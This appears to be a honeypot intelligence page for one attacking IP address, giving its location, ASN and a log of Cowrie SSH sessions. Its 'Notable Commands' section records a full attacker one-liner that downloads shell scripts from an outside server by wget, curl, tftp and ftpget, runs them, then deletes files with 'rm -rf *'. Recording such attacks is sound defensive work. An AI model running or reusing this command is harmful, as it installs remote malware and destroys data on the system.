176.65.148.203
176.65.148.203.ptr.pfcloud.network
Location
🇳🇱 NL / Eygelshoven
ASN
AS51396 · Pfcloud UG (haftungsbeschrankt)
Cloud Provider
—
Total Events
41
Average by volume
Agent Count
1
First / Last Seen
2026-02-28 13:48 — 2026-02-28 13:49
Attack Types
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
7 (2 with login)
Avg Depth Score
0.48
Commands Executed
2
Files Downloaded
4
Notable Commands
- cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.141.26.129/ohshit.sh; curl -O http://45.141.26.129/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 45.141.26.129 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 45.141.26.129; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.141.26.129 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *; rm -rf *
Download URLs
- http://45.141.26.129/ohshit.sh
Fingerprints
HASSH
SSH Client
Recent Events (last 50)
| Timestamp | Port | Proto | Event | Location |
|---|---|---|---|---|
| 2026-02-28 13:49:49 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:49:49 | :22 | ssh | cowrie.log.closed | sea |
| 2026-02-28 13:49:49 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:49:49 | :22 | ssh | cowrie.log.closed | sea |
| 2026-02-28 13:49:41 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:49:40 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 13:49:40 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 13:49:40 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 13:49:31 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:49:30 | :22 | ssh | cowrie.login.failed | sea |
| 2026-02-28 13:49:29 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 13:49:29 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 13:49:29 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 13:49:24 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:49:23 | :22 | ssh | cowrie.login.failed | sea |
| 2026-02-28 13:49:22 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 13:49:22 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 13:49:22 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 13:49:17 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:49:16 | :22 | ssh | cowrie.login.failed | sea |
| 2026-02-28 13:49:16 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 13:49:15 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 13:49:15 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 13:49:11 | :22 | ssh | cowrie.session.file_download | sea |
| 2026-02-28 13:49:11 | :22 | ssh | cowrie.session.file_download | sea |
| 2026-02-28 13:49:10 | :22 | ssh | cowrie.command.input | sea |
| 2026-02-28 13:49:10 | :22 | ssh | cowrie.session.params | sea |
| 2026-02-28 13:49:10 | :22 | ssh | cowrie.login.success | sea |
| 2026-02-28 13:49:09 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 13:49:09 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 13:49:09 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 13:49:05 | :22 | ssh | cowrie.session.file_download | sea |
| 2026-02-28 13:49:05 | :22 | ssh | cowrie.session.file_download | sea |
| 2026-02-28 13:49:04 | :22 | ssh | cowrie.command.input | sea |
| 2026-02-28 13:49:04 | :22 | ssh | cowrie.session.params | sea |
| 2026-02-28 13:49:04 | :22 | ssh | cowrie.login.success | sea |
| 2026-02-28 13:49:03 | :22 | ssh | cowrie.client.kex | sea |
| 2026-02-28 13:49:03 | :22 | ssh | cowrie.client.version | sea |
| 2026-02-28 13:49:03 | :22 | ssh | cowrie.session.connect | sea |
| 2026-02-28 13:48:59 | :22 | ssh | cowrie.session.closed | sea |
| 2026-02-28 13:48:59 | :22 | ssh | cowrie.session.connect | sea |